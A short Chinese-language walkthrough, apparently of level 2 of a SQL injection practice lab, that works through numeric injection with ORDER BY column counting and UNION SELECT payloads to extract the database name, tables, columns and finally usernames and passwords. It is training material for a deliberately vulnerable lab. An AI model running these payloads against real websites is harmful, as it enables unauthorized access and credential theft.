首先我们进入第二关
思路:
1.先判断是什么类型的注入
2.根据类型我们在找注入点
步骤:
1.提示我们输入id数字,那我们先输入1猜一下
2.这里正常回显,当我们后边加上'时可以看到报错,且报错信息看不到数字,所有我们可以猜测sql语句应该是数字型注入
3. 知道时数字型注入后就简单了,和之前第一关的差不多一样
先查库,在查表和列,最后输出显示
?id=1 order by 1
4. 我们就一个一个的试,当输入4时报错不知道第四列
5. 欧克,接下来就是正常操作
?id=-1 union select 1,2,3
6. 我们利用第二个位置开始查
?id=-1 union select 1,database(),3
7. 库名查到就是security
?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27
8. 这不,表名(我们用一下users)就出来了,接下来查一下列名
?id=-1%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27and%20table_name="users"
9. 这三个已经摆在面前了,那就看一下下里边都有啥
/?id=-1%20union%20select%201,2,group_concat(username,0x3a,password)%20from%20%20users
10用的和第一个数据库一样的,所以里边的内容都是一样的,到这里就结束了。